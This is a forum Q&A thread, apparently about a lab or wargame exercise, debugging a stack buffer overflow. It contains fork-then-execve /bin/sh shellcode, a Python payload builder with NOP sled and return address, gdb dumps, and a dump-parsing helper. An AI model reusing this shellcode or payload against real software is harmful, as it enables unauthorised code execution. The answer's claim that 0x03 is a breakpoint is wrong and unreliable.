I am trying to overflow a buffer, which has a size of 0x201 bytes, and get a shellcode. In the program that contains the buffer, there is a call to ptrace() (on itself), therefore the shellcode I'm using calls fork() and then execve() (as a child process).

So, here is what I'm feeding the buffer:

import struct

# shellcode: fork(), then execve("/bin//sh") in the child, as described above
payload5 = b"\x6a\x32\x58\x99\xcd\x80\x89\xc3\x89\xc1\x6a\x46\x58\xcd\x80\xb0\x02\xcd\x80\xb0\x0b\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xd1\xcd\x80"

canary = struct.pack('<I', 3)         # 4-byte little-endian value 3 (native 'L' is 8 bytes on a 64-bit Python)
ret_addr = b"\x10\xda\xff\xff"        # 0xffffda10, little-endian
s = 50
buf_len = 0x201                       # not defined in the original snippet; the buffer size stated above

# NOP sled, shellcode, s more NOPs, canary, 4 filler bytes, then the return address
buf = (b"\x90" * (buf_len - len(payload5) - s)) + payload5 + b"\x90" * s + canary + b"\x90" * 4 + ret_addr

Here is how my buffer looks right after strcpy():

0xffffd9e0: 0x90909090  0x90909090  0x90909090  0x90909090
0xffffd9f0: 0x90909090  0x90909090  0x90909090  0x90909090
0xffffda00: 0x90909090  0x90909090  0x90909090  0x90909090
0xffffda10: 0x90909090  0x90909090  0x90909090  0x90909090
0xffffda20: 0x90909090  0x90909090  0x90909090  0x90909090
0xffffda30: 0x90909090  0x90909090  0x90909090  0x90909090
0xffffda40: 0x90909090  0x90909090  0x90909090  0x90909090
0xffffda50: 0x90909090  0x90909090  0x90909090  0x90909090
0xffffda60: 0x90909090  0x90909090  0x90909090  0x90909090
0xffffda70: 0x90909090  0x90909090  0x90909090  0x90909090
0xffffda80: 0x90909090  0x90909090  0x90909090  0x90909090
0xffffda90: 0x90909090  0x90909090  0x90909090  0x90909090
0xffffdaa0: 0x90909090  0x90909090  0x90909090  0x90909090
0xffffdab0: 0x90909090  0x90909090  0x90909090  0x90909090
0xffffdac0: 0x90909090  0x90909090  0x90909090  0x90909090
0xffffdad0: 0x90909090  0x90909090  0x90909090  0x90909090
0xffffdae0: 0x90909090  0x90909090  0x90909090  0x90909090
0xffffdaf0: 0x90909090  0x90909090  0x90909090  0x90909090
0xffffdb00: 0x90909090  0x90909090  0x90909090  0x90909090
0xffffdb10: 0x90909090  0x90909090  0x90909090  0x90909090
0xffffdb20: 0x90909090  0x90909090  0x90909090  0x90909090
0xffffdb30: 0x90909090  0x90909090  0x90909090  0x90909090
0xffffdb40: 0x90909090  0x90909090  0x90909090  0x90909090
0xffffdb50: 0x90909090  0x90909090  0x90909090  0x90909090
0xffffdb60: 0x90909090  0x90909090  0x90909090  0x6a909090
0xffffdb70: 0xcd995832  0x89c38980  0x58466ac1  0x02b080cd
0xffffdb80: 0x0bb080cd  0x2f6e6852  0x2f686873  0x8969622f
0xffffdb90: 0xcdd189e3  0x90909080  0x90909090  0x90909090
0xffffdba0: 0x90909090  0x90909090  0x90909090  0x90909090
0xffffdbb0: 0x90909090  0x90909090  0x90909090  0x90909090
0xffffdbc0: 0x90909090  0x03909090  0x90909090  0xffffda10

and I am definitely overwriting eip correctly:

Stack level 0, frame at 0xffffdbd0:
eip = 0x8048595 in vulnerable; saved eip = 0xffffda10
called by frame at 0x90909098
Arglist at 0xffffdbc8, args: 
Locals at 0xffffdbc8, Previous frame's sp is 0xffffdbd0
Saved registers:
   ebp at 0xffffdbc8, eip at 0xffffdbcc

The problem is that I am segfaulting at 0xffffdbc6, which goes past my return address.

(gdb) x/i 0xffffdbc6
=> 0xffffdbc6:  add    %ch,0x6e(%ecx)

I get the shell in gdb if I set follow-fork-mode child, and avoid segfaulting. But when I call the actual program, I never get the shell (jobs -l: Segmentation fault).

I would think that the problem is with the shellcode: when I used regular execve shellcode, my shell would just be killed (no segfault), but exactly the same shellcode has proven to work.

So, I really don't know where the problem is...

1 Answer

So, I can't comment yet and I don't have the full answer, but it appears that your program is segfaulting within your NOP sled. I think you are incorrect in stating that 0xffffdbc6 is past your return address.

0xffffdbc0: 0x90909090  0x03909090  0x90909090  0xffffda10

is what you list as the bottom of your stack?

Here it is rewritten:

0xffffdbc0: 0x90909090  
0xffffdbc4: 0x03909090
0xffffdbc8: 0x90909090
0xffffdbcc: 0xffffda10

So, 0xffffdbc6 is NOT past your return address.

Could be wrong on this but I don't think I am. Isn't 0x03 a breakpoint?

Could it be causing you issues when you run the shellcode? Maybe your shellcode doesn't exit gracefully, and so it's crashing even though you are forking.

Anyway, hope this helps.
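The rewriting done in the answer above (splitting each 16-byte dump line into its four words and reading off which word an address falls in) can be done by machine, which avoids exactly the off-by-a-few-bytes misreading the question ran into. The helper below is an added example, not code from the question or the answer. It assumes gdb's `x/wx`-style dump format (a line address followed by four 8-digit hex words, the format the question's dump is in), treats each printed word as little-endian, and reports, for a given address, the containing word, the byte offset inside it and the byte value there. The dump embedded in it is the tail of the question's own dump, from 0xffffdb60 down to the word holding the saved return address at 0xffffdbcc.

```python
import re

# Tail of the memory dump posted in the question (gdb "x/wx" style: a line
# address followed by four 32-bit words), from 0xffffdb60 down to the word
# that holds the saved return address at 0xffffdbcc.
DUMP = """
0xffffdb60: 0x90909090  0x90909090  0x90909090  0x6a909090
0xffffdb70: 0xcd995832  0x89c38980  0x58466ac1  0x02b080cd
0xffffdb80: 0x0bb080cd  0x2f6e6852  0x2f686873  0x8969622f
0xffffdb90: 0xcdd189e3  0x90909080  0x90909090  0x90909090
0xffffdba0: 0x90909090  0x90909090  0x90909090  0x90909090
0xffffdbb0: 0x90909090  0x90909090  0x90909090  0x90909090
0xffffdbc0: 0x90909090  0x03909090  0x90909090  0xffffda10
"""

# Assumed dump format: "<addr>: <word> <word> ..." with 8-hex-digit words.
LINE_RE = re.compile(r"^(0x[0-9a-fA-F]+):((?:\s+0x[0-9a-fA-F]{8})+)\s*$")


def parse_dump(text):
    """Map every 32-bit word in the dump to its address (word i of a line sits at line address + 4*i)."""
    words = {}
    for line in text.strip().splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            raise ValueError("unrecognised dump line: %r" % line)
        base = int(m.group(1), 16)
        for i, tok in enumerate(m.group(2).split()):
            words[base + 4 * i] = int(tok, 16)
    return words


def to_bytes(words):
    """Expand the word map into a byte map. gdb prints each word as one
    little-endian number, so the LOWEST address holds the word's lowest byte
    (the last two hex digits as printed)."""
    mem = {}
    for addr, val in words.items():
        for i in range(4):
            mem[addr + i] = (val >> (8 * i)) & 0xFF
    return mem


def locate(words, addr):
    """Which word contains addr, at what byte offset, and what byte is there."""
    base = addr & ~3
    if base not in words:
        raise KeyError("0x%08x is not covered by the dump" % addr)
    return {
        "word_addr": base,
        "offset": addr - base,
        "word": words[base],
        "byte": to_bytes(words)[addr],
    }


def find_bytes(words, pattern):
    """All addresses at which the byte string `pattern` starts."""
    mem = to_bytes(words)
    lo, hi = min(mem), max(mem)
    return [a for a in range(lo, hi - len(pattern) + 2)
            if all(mem.get(a + i) == pattern[i] for i in range(len(pattern)))]


def fault_is_before_slot(words, fault_addr, slot_addr):
    """True when the faulting address lies below the word holding the saved eip,
    i.e. the fault is inside the overwritten buffer, not past the return address."""
    locate(words, fault_addr)          # raises if the address is not in the dump
    return fault_addr < slot_addr


if __name__ == "__main__":
    words = parse_dump(DUMP)
    fault, slot = 0xFFFFDBC6, 0xFFFFDBCC      # from the question's gdb output
    where = locate(words, fault)
    print("0x%08x is byte %d of the word at 0x%08x (=0x%08x); byte value 0x%02x"
          % (fault, where["offset"], where["word_addr"], where["word"], where["byte"]))
    print("saved eip slot 0x%08x holds 0x%08x" % (slot, words[slot]))
    print("fault before return-address slot:", fault_is_before_slot(words, fault, slot))
    print("0x03 byte(s) at: %s" % ", ".join("0x%08x" % a for a in find_bytes(words, b"\x03")))
    print("shellcode (6a 32 58) starts at: %s"
          % ", ".join("0x%08x" % a for a in find_bytes(words, b"\x6a\x32\x58")))
```

Run as-is it reports that 0xffffdbc6 is byte 2 of the word at 0xffffdbc4 and holds 0x90, that the saved-eip slot 0xffffdbcc holds 0xffffda10, and that the single 0x03 byte sits at 0xffffdbc7; `find_bytes` also pins the first shellcode byte to 0xffffdb6f, which is a quick way to check that a payload landed where the layout arithmetic said it would.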
